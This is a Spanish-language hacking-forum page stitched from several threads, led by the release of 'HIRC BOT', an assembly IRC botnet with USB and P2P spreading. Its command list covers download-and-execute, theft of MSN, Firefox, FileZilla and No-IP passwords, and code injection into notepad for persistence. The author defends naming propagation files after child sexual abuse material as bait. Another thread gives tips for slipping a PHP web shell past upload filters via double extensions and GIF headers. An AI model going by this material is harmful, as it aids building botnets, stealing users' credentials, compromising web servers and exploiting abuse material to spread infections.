Mensajes

Hola alguien me puede ayudar no se como funciona me pueden explicar o dar un manual-

Tienes que por lo menos saber ensamblar en fasm y tener un poco de idea de programación para poder ocuparlo justamente publique el codigo sin ninguna interfas para que no cualquiera lo pudiera usar

Yo hice una tool parecida pero que soloi transforma a hexadecimal un string dejo el codigo

Código (asm) [Seleccionar] Expandir


format pe console
entry start
include 'win32ax.inc'
.code
start:
invoke printf,Logo

invoke printf,"Ingrese la string"
invoke printf,n
invoke scanf,"%s",dBuffer
stdcall StringToHex ,dBuffer ,<invoke lstrlen,dBuffer >,dBuffer2
invoke printf,"La string en hexadecimal es:"
invoke printf,n
invoke printf,"0x%s",dBuffer2
invoke system,"pause>>NULL"
invoke ExitProcess,0
;Descripción: Convierte un dato a hexadecimal
; by YST
proc StringToHex,cPuntero,cCantidad,cBuffer
pushad
mov esi,[cPuntero]

mov edi,[cBuffer]
.bucle:
cmp  [cCantidad],0
je .salir
xor edx,edx
movzx eax,byte[esi]
mov ebx,16
div ebx
mov bl, byte[numeros+eax]
mov byte[edi],bl
mov bl, byte[numeros+edx]
mov byte[edi+1],bl
add edi,2
inc esi
dec  [cCantidad]
jmp  .bucle
.salir:
popad
ret
numeros db '0123456789ABCDEF',0 
endp
.data
Logo db '                      ===================================',13,10          ; LOGO PRINCIPAL
     db '                      =        StringToHex  by YST      =',13,10
     db '                      ===================================',13,10,13,10,13,10,0
dBuffer2 rb MAX_PATH*2
dBuffer  rb MAX_PATH
n db 13,10,0
   section '.idata' import data readable writeable
   library kernel32,'kernel32.dll',msvcrt,'msvcrt.dll'
   include 'api/kernel32.inc'
import msvcrt,printf,"printf",system,"system",scanf,'scanf'

section '.reloc' fixups data discardable

Una pergunta el comando download, baja elarchivo y lo autoejecuta?

Se ve bueno lo tengo que probar.. yo sigo con los viejos rx xD

oye un consejo, hay una opcion en los rx que es la forma del nick que queres(COUNTRYNICK, OWNERNICK o algo asi xDDD).. que peude ser por pais o por el nombre de la maquina o un nombre aleatorio.. estaria bueno que lo tenga el tuyo tambien y lo que no vi fue una pass para los bots.. un login osea te hacen caso solo con el nickmaestro?

solo eso xD

saludos

El comando !DF baja el archivo y lo ejecuta

Lo de los se puede cambiar para que sea "El nick que quieras" + Numero X , el comando !CP mediante un PHP te cambia el nick a "Primera 2 letras del pais" + Numero X .

Sobre lo de hacer un login si quieres lo hago pero no lo veo necesario   

Si por ver el funcionamiento de un bot se debe enaltecer la pornografía infantil yo voto como mínimo que se borre ahora mismo éste tema.

Parece mentira la inmadurez de cierta gente  .

Espero que lo digas en broma .

Cada uno le pone los nombres con que quiere que se propague para eso di el source , esos son los nombre que ocupaba yo , lo siento si les duele la realidad pero la pornografia infantil es muy descargada por las redes p2p y en las propagaciones la idea es que infecten .

Saludos

[humilde]

Si es de YST [ironia]debe de ser de mala calidad[/ironia]

No! Si es de YST ha de ser humilde!

Hulmilde Software ™

La H es de Humilde 

[¿Que es ?]

HIRC BOT v1.1 beta

• ¿Que es ?
  HIRC BOT es un Bot IRC programado en ASM con propagacion USB y P2P(emule y ares )
  
• ¿Cuales comandos tiene?
  
  Código (asm) [Seleccionar] Expandir
  
;######################################################
;######################################################
;#              COMANDOS                              #
;#!CC <canal> <clave>  = Se conecta a otro canal      #
;#!RB                  = Reinicia el server           #
;#!SB                  = Saca el bot                  #
;#!SC                  = Nos desconectamos del canal. #
;#!IP                  = Obtiene la IP del BOT        #
;#!SO                  = Obtiene el sistema operativo #
;#!PN                  = Obtiene el nombre del PC     #
;#!UN                  = Obtiene el nombre de usuario #
;#!HL                  = Obtiene las unidades del PC  #
;#!IG                  = Obtiene informacion del PC   #
;#!LE                  = Obtiene el idioma del PC     #
;#!DF <URL>            = Descarga un archivo.         #
;#!CM                  = Obtiene claves del MSN       #
;#!CF  <URL>(opcional) = Claves Firefox               #
;#!ZF                  = Claves FileZilla             #
;#!CP <PHP>            = Cambia el nick a el pais     #
;#!CN                  = Obtiene claves del No-IP.    #
;#!RA  <File>          = Se propaga por p2p.         #
;######################################################
;###################################################### 

  
  
• ¿Para que son el resto de los archivos?
  Son para el comando "!CC" que utiliza el PHP para detectar el pais de que es el BOT
  
  
• Pequeña explicación sobre cositas del BOT
  El bot crea un proceso del notepad donde inyecta codigo para que si el se cerrara el proceso del BOT se vuelva a abrir.
  
  El BOT tiene propagacion p2p por Emule y ARES.
  
  Las claves del Firefox son de la Ultima version el 3.5.x .
  
  Hay un comando que es el !CD que obtiene las claves del DynDNS que se me olvido ponerlo .
  Descargar

que quieres decir con eso yst, que hay vulnerabilidad?

o que con ese metodo se podria conseguir en x web?

En el metodo de WHK no hay bug ya que detecta la ultima extención y filtra si no es jpeg,gif,etc.. , pero en muchos uploader's que solo filtran extensiones como el .php y eso si esta ese bug

Pero señores, si es .jpg que coño van a ejecutar?

Si no tienes LFI, ni te preocupes, subiran la shell terminada en jpg, y simplemente dara error al mostrarse

No creas...
Si pones en la cabecera
GIF89 mas un code malicioso, puedes hacer algo...
Soler, creo que a tu code le hace falta verificar las cabeceras.

Saludos.

SI filtras por extensiones y prohibes las .php, php5, php4 y demas, ya que el servidor se basa en ello para ejecutar codigo php o no, no puedes hacer nada, no?

Prueba poniendo un archivo .php.renombralo Te lo ejecuta igual

Muy buen code

Tienes una memoria que la quisiera yo ya ni me acordaba que te habia mencionado la idea de que emdiante Mutex se podia bloquear el taskmngr

Saludos

[CLD]

CLD

Borra la bandera de dirección ,asignándole un 0 . Las instrucciones de primitivas de cadena incrementan (e)si y (e)di de manera automatica

Formato de instrucción:
CLD